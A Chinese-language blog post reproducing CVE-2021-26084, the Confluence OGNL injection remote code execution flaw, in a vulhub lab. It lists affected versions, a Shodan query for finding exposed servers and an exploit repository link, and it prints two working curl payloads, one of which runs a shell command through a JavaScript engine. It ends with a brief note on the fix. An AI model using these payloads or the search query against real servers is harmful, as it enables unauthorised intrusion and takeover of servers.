CVE-2021-26084 Confluence OGNL表达式注入命令执行漏洞复现

CVE-2021-26084 Confluence OGNL表达式注入命令执行漏洞复现

漏洞简述

Atlassian Confluence是Atlassian公司出品的专业的企业知识管理与协同软件,可用于构建企业文库等。2021年8月26日Atlassian官方发布公告,披露了CVE-2021-26084 Atlassian Confluence 远程代码执行漏洞。攻击者在经过认证后或在部分场景下无需认证,即可构造恶意请求,造成OGNL表达式注入,从而执行任意代码,控制服务器。

漏洞影响版本

  • Atlassian Confluence Server/Data Center < 6.13.23
  • 6.14.0 ≤ Atlassian Confluence Server/Data Center < 7.4.11
  • 7.5.0 ≤ Atlassian Confluence Server/Data Center < 7.11.6
  • 7.12.0 ≤ Atlassian Confluence Server/Data Center < 7.12.5

Shodan 搜索语法

http.favicon.hash:-305179312

漏洞exp

https://github.com/r0ckysec/CVE-2021-26084_Confluence

漏洞环境搭建

使用vulhub搭建。

漏洞复现

直接发包,得到233*233的计算结果。

curl -X POST -d 'queryString=%5cu0027%2b%7b233*233%7d%2b%5cu0027' http://vul.zgao.top:8090/pages/doenterpagevariables.action 2>/dev/null | grep -C3 54289
curl -X POST -d 'queryString=%5cu0027%2b%7bClass.forName%28%5cu0027javax.script.ScriptEngineManager%5cu0027%29.newInstance%28%29.getEngineByName%28%5cu0027JavaScript%5cu0027%29.%5cu0065val%28%5cu0027var+isWin+%3d+java.lang.System.getProperty%28%5cu0022os.name%5cu0022%29.toLowerCase%28%29.contains%28%5cu0022win%5cu0022%29%3b+var+cmd+%3d+new+java.lang.String%28%5cu0022id%5cu0022%29%3bvar+p+%3d+new+java.lang.ProcessBuilder%28%29%3b+if%28isWin%29%7bp.command%28%5cu0022cmd.exe%5cu0022%2c+%5cu0022%2fc%5cu0022%2c+cmd%29%3b+%7d+else%7bp.command%28%5cu0022bash%5cu0022%2c+%5cu0022-c%5cu0022%2c+cmd%29%3b+%7dp.redirectErrorStream%28true%29%3b+var+process%3d+p.start%28%29%3b+var+inputStreamReader+%3d+new+java.io.InputStreamReader%28process.getInputStream%28%29%29%3b+var+bufferedReader+%3d+new+java.io.BufferedReader%28inputStreamReader%29%3b+var+line+%3d+%5cu0022%5cu0022%3b+var+output+%3d+%5cu0022%5cu0022%3b+while%28%28line+%3d+bufferedReader.readLine%28%29%29+%21%3d+null%29%7boutput+%3d+output+%2b+line+%2b+java.lang.Character.toString%2810%29%3b+%7d%5cu0027%29%7d%2b%5cu0027' http://vul.zgao.top:8090/pages/doenterpagevariables.action 2>/dev/null | grep -C3 uid=

入侵溯源

Confluence本身没有web请求的日志,需要依赖其他组件进行排查。

修复方式

升级Confluence至最新版本。

赞赏

微信赞赏支付宝赞赏

Zgao

愿有一日,安全圈的师傅们都能用上Zgao写的工具。

发表评论